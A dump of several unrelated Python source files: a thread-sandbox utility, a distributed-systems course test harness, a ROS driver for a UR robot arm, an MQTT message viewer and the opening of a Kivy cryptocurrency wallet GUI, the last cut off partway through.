f"ThreadDelegate({self._repr})" def __setattr__(self, name, value): if name in delegate_keys: return object.__setattr__(self, name, value) else: return message(self._sandbox, OP_SET, self._obj, name, value, None) delegate_keys = set(ThreadDelegate.__dict__.keys()).difference(object.__dict__.keys()) @hide_in_traceback def message(sandbox, *msg): req, rsp = sandbox._requestq, Queue(1) # Await and handle request. Exception should be raised in this # (main) thread req.put(msg + (rsp,), True) ret, exc = rsp.get(True) if exc is not None: raise exc return ret class ThreadSandbox(object): """Execute all calls in the class in a separate background thread. This is intended to work around challenges in threading wrapped win32com APIs. Use it as follows: obj = ThreadSandbox(MyClass(myclassarg, myclasskw=myclassvalue)) Then use `obj` as a normal MyClass instance. """ __repr_root__ = "uninitialized ThreadSandbox" __dir_root__ = [] __thread = None _requestq = None def __init__(self, factory, should_sandbox_func=None): # Start the thread and block until it's ready self._requestq = Queue(1) ready = Queue(1) self.__thread = Thread( target=self.__worker, args=(factory, ready, should_sandbox_func) ) self.__thread.start() exc = ready.get(True) if exc is not None: raise exc @hide_in_traceback def __worker(self, factory, ready, sandbox_check_func): """This is the only thread allowed to access the protected object.""" try: root = factory() def default_sandbox_check_func(obj): try: return inspect.getmodule(obj).__name__.startswith( inspect.getmodule(root).__name__ ) except AttributeError: return False if sandbox_check_func is None: sandbox_check_func = default_sandbox_check_func self.__repr_root__ = repr(root) self.__dir_root__ = sorted(list(set(dir(root) + list(sandbox_keys)))) exc = None except Exception as e: exc = e finally: ready.put(exc, True) if exc: return # Do some sort of setup here while True: ret = None exc = None op, obj, name, args, kws, rsp = self._requestq.get(True) # End if that's good if op is OP_QUIT: break if obj is None: obj = root # Do the op try: if op is OP_GET: ret = getattr(obj, name) elif op is OP_CALL: ret = obj(*args, **kws) elif op is OP_SET: ret = setattr(obj, name, args) # Make it a delegate if it needs to be protected if sandbox_check_func(ret): ret = ThreadDelegate(self, ret, dir_=dir(ret), repr_=repr(ret)) # Catch all exceptions except Exception as e: exc = e exc = e rsp.put((ret, exc), True) logger.debug("ThreadSandbox worker thread finished") @hide_in_traceback def __getattr__(self, name): if name in sandbox_keys: return object.__getattribute__(self, name) else: return message(self, OP_GET, None, name, None, None) @hide_in_traceback def __setattr__(self, name, value): if name in sandbox_keys: return object.__setattr__(self, name, value) else: return message(self, OP_SET, None, name, value, None) def _stop(self): message(self, OP_QUIT, None, None, None, None, None) def _kill(self): if isinstance(self.__thread, Thread): self.__thread.join(0) else: raise Exception("no thread running to kill") def __del__(self): try: del_ = message(self, OP_GET, None, "__del__", None, None) except AttributeError: pass else: del_() finally: try: self._kill() except BaseException: pass def __repr__(self): return f"ThreadSandbox({self.__repr_root__})" def __dir__(self): return self.__dir_root__ sandbox_keys = set(ThreadSandbox.__dict__.keys()).difference(object.__dict__.keys()) class ConfigStore: """Define dictionaries of configuration value traits in subclasses of this object. Each dictionary should be an attribute of the subclass. The all() class method returns a flattened dictionary consisting of all values of these dictionary attributes, keyed according to '{attr_name}_{attr_key}', where {attr_name} is the name of the dictionary attribute and {attr_key} is the nested dictionary key. """ @classmethod def all(cls): """Return a dictionary of all attributes in the class""" ret = {} for k, v in cls.__dict__.items(): if isinstance(v, dict) and not k.startswith("_"): ret.update([(k + "_" + k2, v2) for k2, v2 in v.items()]) return ret @classmethod def frame(cls): """Return a pandas DataFrame containing all attributes in the class """ import pandas as pd df = pd.DataFrame([cls.all()]).T df.columns.name = "Value" df.index.name = "Parameter" return df import ast import textwrap import re def accessed_attributes(method): """enumerate the attributes of the parent class accessed by `method` :method: callable that is a method or defined in a class Returns: tuple of attribute names """ # really won't work unless method is a callable defined inside a class if not inspect.isroutine(method): raise ValueError(f"{method} is not a method") elif not inspect.ismethod(method) and "." not in method.__qualname__: raise ValueError(f"{method} is not defined in a class") # parse into a code tree source = inspect.getsource(method) # filter out lines that start with comments, which have no tokens and confuse textwrap.dedent source = "\n".join(re.findall("^[\ \t\r\n]*[^\#].*", source, re.MULTILINE)) parsed = ast.parse(textwrap.dedent(source)) if len(parsed.body) > 1: # this should not be possible raise Exception("ast parsing gave unexpected extra nodes") # pull out the function node and the name for the class instance func = parsed.body[0] if not isinstance(func, ast.FunctionDef): raise SyntaxError("this object doesn't look like a method") self_name = func.args.args[0].arg def isselfattr(node): return ( isinstance(node, ast.Attribute) and getattr(node.value, "id", None) == self_name ) return tuple({node.attr for node in ast.walk(func) if isselfattr(node)})
master.py
""" The master program for CS5414 project 0 """ import os import signal import subprocess import sys import time import platform from socket import SOCK_STREAM, socket, AF_INET from threading import Thread address = 'localhost' threads = {} # ends up keeping track of who is alive wait_ack = False class ClientHandler(Thread): def __init__(self, index, address, port, process): Thread.__init__(self) self.index = index self.sock = socket(AF_INET, SOCK_STREAM) self.sock.connect((address, port)) self.buffer = "" self.valid = True self.process = process def run(self): global threads, wait_ack while self.valid: if "\n" in self.buffer: (l, rest) = self.buffer.split("\n", 1) self.buffer = rest s = l.split() if s[0] == 'messages': sys.stdout.write(l + '\n') sys.stdout.flush() wait_ack = False elif s[0] == 'alive': sys.stdout.write(l + '\n') sys.stdout.flush() wait_ack = False else: print("Invalid Response: " + l) else: try: data = self.sock.recv(1024) # sys.stderr.write(data) self.buffer += data except: # print(sys.exc_info()) self.valid = False del threads[self.index] self.sock.close() break def kill(self): if self.valid: if platform.system() == 'Darwin': # MacOS self.send('crash\n') else: os.killpg(os.getpgid(self.process.pid), signal.SIGKILL) self.close() def send(self, s): if self.valid: self.sock.send(str(s) + '\n') def close(self): try: self.valid = False self.sock.close() except: pass def kill(index): global wait_ack, threads wait = wait_ack while wait: time.sleep(0.01) wait = wait_ack pid = int(index) if pid >= 0: if pid not in threads: print('Master or testcase error!') return threads[pid].kill() def send(index, data, set_wait_ack=False): global threads, wait_ack wait = wait_ack while wait: time.sleep(0.01) wait = wait_ack pid = int(index) if pid >= 0: if pid not in threads: print('Master or testcase error!') return if set_wait_ack: wait_ack = True threads[pid].send(data) return if set_wait_ack: wait_ack = True threads[pid].send(data) def exit(force=False): global threads, wait_ack wait = wait_ack wait = wait and (not force) while wait: time.sleep(0.01) wait = wait_ack for k in threads: kill(k) subprocess.Popen(['./stopall'], stdout=open('/dev/null', 'w'), stderr=open('/dev/null', 'w')) time.sleep(0.1) if debug: print("Goodbye :)") sys.exit(0) def timeout(): time.sleep(120) print('Timeout!') exit(True) def main(debug=False): global threads, wait_ack timeout_thread = Thread(target=timeout, args=()) timeout_thread.setDaemon(True) timeout_thread.start() if debug: print("Master started") while True: line = '' try: line = sys.stdin.readline() except: # keyboard exception, such as Ctrl+C/D exit(True) if line == '': # end of a file exit() line = line.strip() # remove trailing '\n' if line == '': # prompt again if just whitespace continue if line == 'exit': # exit when reading 'exit' command if debug: print("Received exit command. Terminating...") exit() sp1 = line.split(None, 1) sp2 = line.split() if len(sp1) != 2: # validate input print("Invalid command: " + line) continue if sp1[0] == 'sleep': # sleep command time.sleep(float(sp1[1]) / 1000) continue try: pid = int(sp2[0]) # first field is pid except ValueError: print("Invalid pid: " + sp2[0]) exit(True) cmd = sp2[1] # second field is command if cmd == 'start': try: port = int(sp2[3]) except ValueError: print("Invalid port: " + sp2[3]) exit(True) if debug: process = subprocess.Popen(['./process', str(pid), sp2[2], sp2[3]], preexec_fn=os.setsid) else: process = subprocess.Popen(['./process', str(pid), sp2[2], sp2[3]], stdout=open('/dev/null', 'w'), stderr=open('/dev/null', 'w'), preexec_fn=os.setsid) # sleep for a while to allow the process be ready time.sleep(3) # connect to the port of the pid handler = ClientHandler(pid, address, port, process) threads[pid] = handler handler.start() elif cmd == 'get' or cmd == 'alive': send(pid, sp1[1], set_wait_ack=True) elif cmd == 'broadcast': send(pid, sp1[1]) elif cmd == 'crash': kill(pid) time.sleep(1) # sleep for a bit so that crash is detected else: print("Invalid command: " + line) if __name__ == '__main__': debug = False if len(sys.argv) > 1 and sys.argv[1] == 'debug': debug = True main(debug)
ur_driver_lite.py
#!/usr/bin/env python3 # http://wiki.ros.org/ROS/Tutorials/WritingPublisherSubscriber%28python%29 import rospy import threading import socket import time import math import ur_rtde import os import geometry_msgs.msg import std_msgs.msg import pyquaternion # pip install pyquaternion # http://kieranwynn.github.io/pyquaternion import tf class Driver(): """The Driver class does a couple of things: 1: It sets up a few ros publishers that constantly publish some information from the robot. It uses the the Real Time Data Exchange (rtde) to get data from the robot then uses a seperate publishing thread to publish it on ROS topics 2: It constantly tries to ensure that the robot is running the correct ur script. For the driver to work, the robot needs to be running a custom ur script that communicates with the driver. The program loop checks if there is a healthy heartbeat between the robot and the driver. If the heartbeat is unhealthy the ur script is continuously send to the robot. 3: It subscribes to a heap of movement and gripper topics. When it receives messages it will move the robot respectively.""" class Registers(): """ This sub class just contains a heap of constants that describe what rtde registers have been used for""" X = "input_double_register_0" Y = "input_double_register_1" Z = "input_double_register_2" RX = "input_double_register_3" RY = "input_double_register_4" RZ = "input_double_register_5" GRIPPER_POS_INPUT = "input_double_register_6" GRIPPER_SPEED_INPUT = "input_double_register_7" GRIPPER_FORCE_INPUT = "input_double_register_8" GRIPPER_POS_OUTPUT = "output_double_register_0" GRIPPER_OBJ_DETECTED_OUTPUT = "output_int_register_3" HEARTBEAT_INPUT = "input_int_register_0" HEARTBEAT_OUTPUT = "output_int_register_0" MOVEMENT_COUNTER_INPUT = "input_int_register_1" MOVEMENT_COUNTER_OUTPUT = "output_int_register_1" GRIPPER_COUNTER_INPUT = "input_int_register_2" GRIPPER_COUNTER_OUTPUT = "output_int_register_2" MOVEMENT_TYPE = "input_int_register_3" def __init__(self,robot_ip_address): self.robot_ip_address = robot_ip_address self.alive = True self.publish_loop_thread = threading.Thread(target=self.__publish_loop, name="Publish Thread") self.program_loop_thread = threading.Thread(target=self.__program_loop, name="Program Thread") self.real_time_data_exchange = ur_rtde.UrRealTimeDataExchange(robot_ip_address) self.movement_counter = 0 self.gripper_counter = 0 def __enter__(self): print("ur_driver_lite enter called") rospy.init_node("ur_driver_lite") rospy.Subscriber("move_to_pose",geometry_msgs.msg.Transform,self.__move_to_pose_callback) rospy.Subscriber("servo_to_pose",geometry_msgs.msg.Transform,self.__servo_to_pose_callback) rospy.Subscriber("move_at_speed",geometry_msgs.msg.Twist,self.__move_at_speed_callback) rospy.Subscriber("move_gripper_to_pos",std_msgs.msg.Float32,self.__gripper_pos_callback) self.tcp_force_pub = rospy.Publisher("tcp_wrench",geometry_msgs.msg.Wrench,queue_size=10) self.joint_angle_pub = rospy.Publisher("joint_angle",std_msgs.msg.Float32MultiArray,queue_size=10) self.gripper_pos_pub = rospy.Publisher("gripper_pos",std_msgs.msg.Float32,queue_size=10) self.gripper_obj_detected_pub = rospy.Publisher("gripper_obj_detected",std_msgs.msg.Bool,queue_size=10) self.real_time_data_exchange.__enter__() self.publish_loop_thread.start() self.program_loop_thread.start() print("ur_driver_lite enter complete") return self def __exit__(self,*args): print("exit called") self.alive = False self.publish_loop_thread.join() self.program_loop_thread.join() self.real_time_data_exchange.__exit__(args) print("exit complete") def __publish_loop(self): """ The publish loop should be called from another thread. It will run continuously to get data from the real time data exchange and publish it on ros """ #instanciate transform broadcaster so that we can broadcast tcp and #camera position br = tf.TransformBroadcaster() #publish while alive while self.alive: #create a dict of the variables we want to read from the rtde output_data = { "actual_TCP_pose":None, "actual_TCP_force":None, Driver.Registers.GRIPPER_POS_OUTPUT:None, Driver.Registers.GRIPPER_OBJ_DETECTED_OUTPUT:None, "actual_q":None } #read the data from the rtde into our dict self.real_time_data_exchange.get_output_data(output_data) #Get tcp pose in the form [x,y,z,rx,ry,rz]. Note rotation uses axis angle tcp_pose = output_data["actual_TCP_pose"] #get the translations as [x,y,z] t = tcp_pose[0:3] #The rotation angle is the length of the vector [rx,ry,rz]. Pythagoras yo angle = math.sqrt( tcp_pose[3]**2 + tcp_pose[4]**2 + tcp_pose[5]**2 ) #create ros quaternion from angle and axis q = tf.transformations.quaternion_about_axis(angle,tcp_pose[3:6]) #publish robot tool center point with respect to robot base br.sendTransform(t,q,rospy.Time.now(),"ur_tcp","base") # q1 = tf.transformations.quaternion_about_axis(90/180.0*math.pi,(0,0,1)) q2 = tf.transformations.quaternion_about_axis(-104/180.0*math.pi,(0,1,0)) q3 = tf.transformations.quaternion_multiply(q1,q2) br.sendTransform((0.0,-0.065,0.04),q3,rospy.Time.now(),"camera_link","ur_tcp",) # publish robot gripper: br.sendTransform((0.0,0.0,0.2485),(0,0,0,1),rospy.Time.now(),"gripper_point","ur_tcp",) #publish the robots force and torque fx,fy,fz,tx,ty,tz = output_data["actual_TCP_force"] force = geometry_msgs.msg.Vector3(fx,fy,fz) torque = geometry_msgs.msg.Vector3(tx,ty,tz) wrench_msg = geometry_msgs.msg.Wrench(force,torque) self.tcp_force_pub.publish(wrench_msg) #publish the joint angles (actual q) actualQ = output_data["actual_q"] jointAngles = std_msgs.msg.Float32MultiArray(data=actualQ) self.joint_angle_pub.publish(jointAngles) #publish gripper feedback self.gripper_pos_pub.publish( output_data[Driver.Registers.GRIPPER_POS_OUTPUT] ) self.gripper_obj_detected_pub.publish( output_data[Driver.Registers.GRIPPER_OBJ_DETECTED_OUTPUT] ) #print(output_data["actual_TCP_force"]) time.sleep(0.01) def __program_loop(self): while self.alive: try: self.secondary_client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #self.secondary_client_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)#not sure if this is needed by just copied this #self.secondary_client_socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)#not sure if this is needed by just copied this self.secondary_client_socket.settimeout(1) self.secondary_client_socket.connect((self.robot_ip_address, 30002)) dir_path = os.path.dirname(os.path.realpath(__file__)) + "/robot_ur_script" with open(dir_path, "rb") as f: script = f.read() while self.alive: self.secondary_client_socket.sendall(script) last_time = time.time() inputs = {Driver.Registers.HEARTBEAT_INPUT:0} outputs = {Driver.Registers.HEARTBEAT_OUTPUT:0} while self.alive: self.real_time_data_exchange.set_input_data(inputs) self.real_time_data_exchange.get_output_data(outputs) if inputs[Driver.Registers.HEARTBEAT_INPUT] == outputs[Driver.Registers.HEARTBEAT_OUTPUT]: inputs[Driver.Registers.HEARTBEAT_INPUT] += 1 last_time = time.time() if time.time() - last_time > 2.0: print("Program watchdog timeout") break time.sleep(0.1) self.secondary_client_socket.sendall("speedj([0,0,0,0,0,0],a=1.0)\n") except (OSError,socket.timeout,socket.error) as e: time.sleep(0.5) except Exception as e: self.alive = False raise e finally: pass def __move_to_pose_callback(self,data): t = data.translation r = data.rotation q = pyquaternion.Quaternion(r.w,r.x,r.y,r.z) axis_angle = q.axis axis_angle[0] *= q.radians axis_angle[1] *= q.radians axis_angle[2] *= q.radians self.movement_counter += 1 input_dict = { Driver.Registers.X: t.x, Driver.Registers.Y: t.y, Driver.Registers.Z: t.z, Driver.Registers.RX: axis_angle[0], Driver.Registers.RY: axis_angle[1], Driver.Registers.RZ: axis_angle[2], Driver.Registers.MOVEMENT_TYPE : 1, #movment type Driver.Registers.MOVEMENT_COUNTER_INPUT : self.movement_counter } self.real_time_data_exchange.set_input_data(input_dict) def __servo_to_pose_callback(self,data): t = data.translation r = data.rotation q = pyquaternion.Quaternion(r.w,r.x,r.y,r.z) axis_angle = q.axis axis_angle[0] *= q.radians axis_angle[1] *= q.radians axis_angle[2] *= q.radians self.movement_counter += 1 input_dict = { Driver.Registers.X: t.x, Driver.Registers.Y: t.y, Driver.Registers.Z: t.z, Driver.Registers.RX: axis_angle[0], Driver.Registers.RY: axis_angle[1], Driver.Registers.RZ: axis_angle[2], Driver.Registers.MOVEMENT_TYPE : 2, #movment type Driver.Registers.MOVEMENT_COUNTER_INPUT : self.movement_counter } self.real_time_data_exchange.set_input_data(input_dict) def __move_at_speed_callback(self,data): linear = data.linear angular = data.angular self.movement_counter += 1 input_dict = { Driver.Registers.X: linear.x, Driver.Registers.Y: linear.y, Driver.Registers.Z: linear.z, Driver.Registers.RX: angular.x, Driver.Registers.RY: angular.y, Driver.Registers.RZ: angular.z, Driver.Registers.MOVEMENT_TYPE : 3, #movment type Driver.Registers.MOVEMENT_COUNTER_INPUT : self.movement_counter } self.real_time_data_exchange.set_input_data(input_dict) def __gripper_pos_callback(self,data): self.gripper_counter += 1 input_dict = { Driver.Registers.GRIPPER_POS_INPUT: data.data, Driver.Registers.GRIPPER_SPEED_INPUT: 100.0, Driver.Registers.GRIPPER_FORCE_INPUT: 100.0, Driver.Registers.GRIPPER_COUNTER_INPUT : self.gripper_counter } self.real_time_data_exchange.set_input_data(input_dict) if __name__ == "__main__": with Driver("10.90.184.11") as driver: print("ur driver starting spin") rospy.spin()
asmqttviewer.py
# Copyright 2021 Nokia # Licensed under the BSD 3-Clause License. # SPDX-License-Identifier: BSD-3-Clause import paho.mqtt.client as mqtt import paho.mqtt.subscribe as subscribe import json import ast import threading from colors import * def processMessage(p, t): print("Message received ", p, t) m = ast.literal_eval(p.decode("ascii")) print(m, t, t == "AS/C") if t == "AS/IM": s = ( m["t"].ljust(20) + " - " + m["op"].ljust(7) + m["data"]["kind"].ljust(10) + " " + m["data"]["itemid"] ) print(color(s, fg="white")) elif t == "AS/C": s = ( m["t"].ljust(20) + " - " + m["op"].ljust(7) + m["data"]["kind"].ljust(10) + " " + m["data"]["itemid"] ) print(color(s, fg="cyan")) elif t == "AS/R": r = str(m["data"]["result"]) s = ( m["t"].ljust(20) + " - " + m["op"].ljust(7) + m["data"]["kind"].ljust(10) + " " + m["data"]["itemid"] ) if r == "0": print(color(s, fg="green"), " ", color(r, fg="blue", bg="black")) elif r == "9001": print(color(s, fg="red"), " ", color(r, fg="yellow", bg="red")) else: print(color(s, fg="yellow"), " ", color(r, fg="blue", bg="orange")) else: print(color("UNEXPECTED INTERNAL ERROR " + t + " " + p, fg="orange")) def on_connect(client, metadata, flags, rc): print(" +--- MQTT Client connected") def on_disconnect(client, metadata, flags, rc): print(" +--- MQTT Client disconnected, retrying connect") try: client.reconnect() except: print(" +--- MQTT client reconnection error") def on_message(client, userdata, message): print("message") # x = threading.Thread(target=processMessage, args=(message.payload, message.topic,)) # x.start() processMessage(message.payload, message.topic) # MAIN print("\n\nAS MQTT Terminal Viewer\n\n") broker_port = 1883 # broker_port= 8560 # broker_url="10.144.176.146" broker_url = "127.0.0.1" client = mqtt.Client() client.on_connect = on_connect client.on_message = on_message client.connect(broker_url, broker_port) print(" +--- MQTT Client connection is ", client) client.subscribe("AS/R", qos=1) client.subscribe("AS/C", qos=1) client.subscribe("AS/IM", qos=1) client.subscribe("AS/MQTTPING", qos=1) print(" +--- Running, press ctrl+C to stop\n\n") client.loop_start() x = input("Press CTRL+C to stop") print(" +--- Exiting.")
main_window.py
import re import os import sys import time import datetime import traceback from decimal import Decimal import threading import asyncio from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence from electrum_spero.storage import WalletStorage, StorageReadWriteError from electrum_spero.wallet_db import WalletDB from electrum_spero.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet from electrum_spero.wallet import check_password_for_directory, update_password_for_directory from electrum_spero.plugin import run_hook from electrum_spero import util from electrum_spero.util import (profiler, InvalidPassword, send_exception_to_crash_reporter, format_satoshis, format_satoshis_plain, format_fee_satoshis, maybe_extract_bolt11_invoice) from electrum_spero.invoices import PR_PAID, PR_FAILED from electrum_spero import blockchain from electrum_spero.network import Network, TxBroadcastError, BestEffortRequestFailed from electrum_spero.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr from electrum_spero.logging import Logger from electrum_spero.gui import messages from .i18n import _ from . import KIVY_GUI_PATH from kivy.app import App from kivy.core.window import Window from kivy.utils import platform from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty, StringProperty, ListProperty, BooleanProperty, NumericProperty) from kivy.cache import Cache from kivy.clock import Clock from kivy.factory import Factory from kivy.metrics import inch from kivy.lang import Builder from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog, PasswordDialog from .uix.dialogs.choice_dialog import ChoiceDialog ## lazy imports for factory so that widgets can be used in kv #Factory.register('InstallWizard', module='electrum_spero.gui.kivy.uix.dialogs.installwizard') #Factory.register('InfoBubble', module='electrum_spero.gui.kivy.uix.dialogs') #Factory.register('OutputList', module='electrum_spero.gui.kivy.uix.dialogs') #Factory.register('OutputItem', module='electrum_spero.gui.kivy.uix.dialogs') from .uix.dialogs.installwizard import InstallWizard from .uix.dialogs import InfoBubble, crash_reporter from .uix.dialogs import OutputList, OutputItem from .uix.dialogs import TopLabel, RefLabel from .uix.dialogs.question import Question #from kivy.core.window import Window #Window.softinput_mode = 'below_target' # delayed imports: for startup speed on android notification = app = ref = None # register widget cache for keeping memory down timeout to forever to cache # the data Cache.register('electrum_spero_widgets', timeout=0) from kivy.uix.screenmanager import Screen from kivy.uix.tabbedpanel import TabbedPanel from kivy.uix.label import Label from kivy.core.clipboard import Clipboard Factory.register('TabbedCarousel', module='electrum_spero.gui.kivy.uix.screens') # Register fonts without this you won't be able to use bold/italic... # inside markup. from kivy.core.text import Label Label.register( 'Roboto', KIVY_GUI_PATH + '/data/fonts/Roboto.ttf', KIVY_GUI_PATH + '/data/fonts/Roboto.ttf', KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf', KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf', ) from electrum_spero.util import (NoDynamicFeeEstimates, NotEnoughFunds, BITCOIN_BIP21_URI_SCHEME, LIGHTNING_URI_SCHEME, UserFacingException) from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog from .uix.dialogs.lightning_channels import LightningChannelsDialog, SwapDialog if TYPE_CHECKING: from . import ElectrumGui from electrum_spero.simple_config import SimpleConfig from electrum_spero.plugin import Plugins from electrum_spero.paymentrequest import PaymentRequest class ElectrumWindow(App, Logger): electrum_config = ObjectProperty(None) language = StringProperty('en') # properties might be updated by the network num_blocks = NumericProperty(0) num_nodes = NumericProperty(0) server_host = StringProperty('') server_port = StringProperty('') num_chains = NumericProperty(0) blockchain_name = StringProperty('') fee_status = StringProperty('Fee') balance = StringProperty('') fiat_balance = StringProperty('') is_fiat = BooleanProperty(False) blockchain_forkpoint = NumericProperty(0) lightning_gossip_num_peers = NumericProperty(0) lightning_gossip_num_nodes = NumericProperty(0) lightning_gossip_num_channels = NumericProperty(0) lightning_gossip_num_queries = NumericProperty(0) auto_connect = BooleanProperty(False) def on_auto_connect(self, instance, x): net_params = self.network.get_parameters() net_params = net_params._replace(auto_connect=self.auto_connect) self.network.run_from_another_thread(self.network.set_parameters(net_params)) def toggle_auto_connect(self, x): self.auto_connect = not self.auto_connect oneserver = BooleanProperty(False) def on_oneserver(self, instance, x): net_params = self.network.get_parameters() net_params = net_params._replace(oneserver=self.oneserver) self.network.run_from_another_thread(self.network.set_parameters(net_params)) def toggle_oneserver(self, x): self.oneserver = not self.oneserver proxy_str = StringProperty('') def update_proxy_str(self, proxy: dict): mode = proxy.get('mode') host = proxy.get('host') port = proxy.get('port') self.proxy_str = (host + ':' + port) if mode else _('None') def choose_server_dialog(self, popup): protocol = PREFERRED_NETWORK_PROTOCOL def cb2(server_str): popup.ids.server_str.text = server_str servers = self.network.get_servers() server_choices = {} for _host, d in sorted(servers.items()): port = d.get(protocol) if port: server = ServerAddr(_host, port, protocol=protocol) server_choices[server.net_addr_str()] = _host ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open() def maybe_switch_to_server(self, server_str: str): net_params = self.network.get_parameters() try: server = ServerAddr.from_str_with_inference(server_str) if not server: raise Exception("failed to parse") except Exception as e: self.show_error(_("Invalid server details: {}").format(repr(e))) return net_params = net_params._replace(server=server) self.network.run_from_another_thread(self.network.set_parameters(net_params)) def choose_blockchain_dialog(self, dt): chains = self.network.get_blockchains() def cb(name): with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items()) for chain_id, b in blockchain_items: if name == b.get_name(): self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id)) chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains] chain_objects = filter(lambda b: b is not None, chain_objects) names = [b.get_name() for b in chain_objects] if len(names) > 1: cur_chain = self.network.blockchain().get_name() ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open() use_rbf = BooleanProperty(False) def on_use_rbf(self, instance, x): self.electrum_config.set_key('use_rbf', self.use_rbf, True) use_gossip = BooleanProperty(False) def on_use_gossip(self, instance, x): self.electrum_config.set_key('use_gossip', self.use_gossip, True) if self.network: if self.use_gossip: self.network.start_gossip() else: self.network.run_from_another_thread( self.network.stop_gossip()) use_change = BooleanProperty(False) def on_use_change(self, instance, x): if self.wallet: self.wallet.use_change = self.use_change self.wallet.db.put('use_change', self.use_change) self.wallet.save_db() use_unconfirmed = BooleanProperty(False) def on_use_unconfirmed(self, instance, x): self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True) use_recoverable_channels = BooleanProperty(True) def on_use_recoverable_channels(self, instance, x): self.electrum_config.set_key('use_recoverable_channels', self.use_recoverable_channels, True) def switch_to_send_screen(func): # try until send_screen is available def wrapper(self, *args): f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True Clock.schedule_interval(f, 0.1) return wrapper @switch_to_send_screen def set_URI(self, uri): self.send_screen.set_URI(uri) @switch_to_send_screen def set_ln_invoice(self, invoice): self.send_screen.set_ln_invoice(invoice) def on_new_intent(self, intent): data = str(intent.getDataString()) scheme = str(intent.getScheme()).lower() if scheme == BITCOIN_BIP21_URI_SCHEME: self.set_URI(data) elif scheme == LIGHTNING_URI_SCHEME: self.set_ln_invoice(data) def on_language(self, instance, language): self.logger.info('language: {}'.format(language)) _.switch_lang(language) def update_history(self, *dt): if self.history_screen: self.history_screen.update() def on_quotes(self, d): self.logger.info("on_quotes") self._trigger_update_status() self._trigger_update_history() def on_history(self, d): self.logger.info("on_history") if self.wallet: self.wallet.clear_coin_price_cache() self._trigger_update_history() def on_fee_histogram(self, *args): self._trigger_update_history() def on_request_status(self, event, wallet, key, status): req = self.wallet.receive_requests.get(key) if req is None: return if self.receive_screen: if status == PR_PAID: self.receive_screen.update() else: self.receive_screen.update_item(key, req) if self.request_popup and self.request_popup.key == key: self.request_popup.update_status() if status == PR_PAID: self.show_info(_('Payment Received') + '\n' + key) self._trigger_update_history() def on_invoice_status(self, event, wallet, key): req = self.wallet.get_invoice(key) if req is None: return status = self.wallet.get_invoice_status(req) if self.send_screen: if status == PR_PAID: self.send_screen.update() else: self.send_screen.update_item(key, req) if self.invoice_popup and self.invoice_popup.key == key: self.invoice_popup.update_status() def on_payment_succeeded(self, event, wallet, key): description = self.wallet.get_label(key) self.show_info(_('Payment succeeded') + '\n\n' + description) self._trigger_update_history() def on_payment_failed(self, event, wallet, key, reason): self.show_info(_('Payment failed') + '\n\n' + reason) def _get_bu(self): return self.electrum_config.get_base_unit() def _set_bu(self, value): self.electrum_config.set_base_unit(value) self._trigger_update_status() self._trigger_update_history() wallet_name = StringProperty(_('No Wallet')) base_unit = AliasProperty(_get_bu, _set_bu) fiat_unit = StringProperty('') def on_fiat_unit(self, a, b): self._trigger_update_history() def decimal_point(self): return self.electrum_config.get_decimal_point() def btc_to_fiat(self, amount_str): if not amount_str: return '' if not self.fx.is_enabled(): return '' rate = self.fx.exchange_rate() if rate.is_nan(): return '' fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8) return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.') def fiat_to_btc(self, fiat_amount): if not fiat_amount: return '' rate = self.fx.exchange_rate() if rate.is_nan(): return '' satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate)) return format_satoshis_plain(satoshis, decimal_point=self.decimal_point()) def get_amount(self, amount_str): a, u = amount_str.split() assert u == self.base_unit try: x = Decimal(a) except: return None p = pow(10, self.decimal_point()) return int(p * x) _orientation = OptionProperty('landscape', options=('landscape', 'portrait')) def _get_orientation(self): return self._orientation orientation = AliasProperty(_get_orientation, None, bind=('_orientation',)) '''Tries to ascertain the kind of device the app is running on. Cane be one of `tablet` or `phone`. :data:`orientation` is a read only `AliasProperty` Defaults to 'landscape' ''' _ui_mode = OptionProperty('phone', options=('tablet', 'phone')) def _get_ui_mode(self): return self._ui_mode ui_mode = AliasProperty(_get_ui_mode, None, bind=('_ui_mode',)) '''Defines tries to ascertain the kind of device the app is running on. Cane be one of `tablet` or `phone`. :data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone' ''' def __init__(self, **kwargs): # initialize variables self._clipboard = Clipboard self.info_bubble = None self.nfcscanner = None self.tabs = None self.is_exit = False self.wallet = None # type: Optional[Abstract_Wallet] self.pause_time = 0 self.asyncio_loop = asyncio.get_event_loop() self.password = None self._use_single_password = False self.resume_dialog = None App.__init__(self)#, **kwargs) Logger.__init__(self) self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig self.language = config.get('language', 'en') self.network = network = kwargs.get('network', None) # type: Network if self.network: self.num_blocks = self.network.get_local_height() self.num_nodes = len(self.network.get_interfaces()) net_params = self.network.get_parameters() self.server_host = net_params.server.host self.server_port = str(net_params.server.port) self.auto_connect = net_params.auto_connect self.oneserver = net_params.oneserver self.proxy_config = net_params.proxy if net_params.proxy else {} self.update_proxy_str(self.proxy_config) self.plugins = kwargs.get('plugins', None) # type: Plugins self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui self.daemon = self.gui_object.daemon self.fx = self.daemon.fx self.use_rbf = config.get('use_rbf', True) self.use_gossip = config.get('use_gossip', False) self.use_unconfirmed = not config.get('confirmed_only', False) # create triggers so as to minimize updating a max of 2 times a sec self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5) self._trigger_update_status = 